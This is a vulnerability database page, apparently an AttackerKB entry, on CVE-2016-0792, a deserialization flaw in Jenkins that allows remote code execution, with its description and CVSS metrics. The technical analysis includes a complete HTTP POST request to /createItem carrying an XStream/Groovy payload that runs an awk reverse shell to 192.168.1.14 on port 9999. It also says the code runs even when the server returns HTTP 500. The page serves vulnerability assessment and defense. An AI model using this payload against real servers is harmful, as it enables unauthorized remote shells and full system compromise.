Attacker Value
Very High
CVE-2016-0792
CVE-2016-0792
(Last updated October 05, 2023) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Metasploit Module
Description
Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
Add Assessment
1
Technical Analysis
It’s easy to get RCE with a Groovy payload. Your code will be executed even if you receive an HTTP 500 error.
Example of request / payload:
POST /createItem?name=example HTTP/1.1 Host: example.org Content-Length: 689 Content-Type: application/xml; Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close <map> <entry> <groovy.util.Expando> <expandoProperties> <entry> <string>hashCode</string> <org.codehaus.groovy.runtime.MethodClosure> <delegate class="groovy.util.Expando"/> <owner class="java.lang.ProcessBuilder"> <command> <string>awk</string> <string>'BEGIN {s = "/inet/tcp/0/192.168.1.14/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'</string> <string>/dev/null</string> </command> </owner> <method>start</method> </org.codehaus.groovy.runtime.MethodClosure> </entry> </expandoProperties> </groovy.util.Expando> <int>1</int> </entry> </map>
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High
General Information
Vendors
- jenkins,
- redhat
Products
- jenkins,
- openshift 3.1
Metasploit Modules
References
Advisory
